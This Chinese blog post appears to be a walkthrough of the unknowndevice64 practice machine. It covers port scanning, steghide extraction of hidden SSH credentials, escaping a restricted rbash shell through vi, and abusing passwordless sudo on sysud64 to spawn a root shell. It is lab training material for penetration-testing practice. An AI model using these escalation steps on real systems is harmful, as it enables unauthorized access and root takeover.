unknowndevice64-V1.0靶机渗透测试

1.查看靶机IP地址

arp-scan -l
nmap -sP+攻击机ip地址

2.查看靶机开放端口

nmap -sS -Pn -A -p- -n 靶机ip

发现靶机开放1337-ssh端口服务,31337-http端口服务;

3.根据端口服务进行渗透(31337-http端口服务)

查看网页源代码

把图片下载到本地

猜测是ctf的隐写漏洞

Kali Steghide开源隐写工具  

http://blog.csdn.net/weixin_46700042/article/details/108565769

用steghide进行提取其中的文本信息:

steghide extract -sf key_is_h1dd3n.jpg

提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;

打开之后的文件信息为一种brainfuck的程序语言,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;

4.登陆ssh(1337-ssh端口服务)
ssh ud64@192.168.110.197 -p 1337

尝试各种命令都被限制,竟然是rbash的shell

5.绕过rbash提权

在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

使用sudo-l查看sudo权限,发现可以无密码登录sysud64

使用sudo sysud64 -h查看帮助消息,发现可以使用

-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

sudo sysud64 -o /dev/null /bin/sh

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zzyit

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值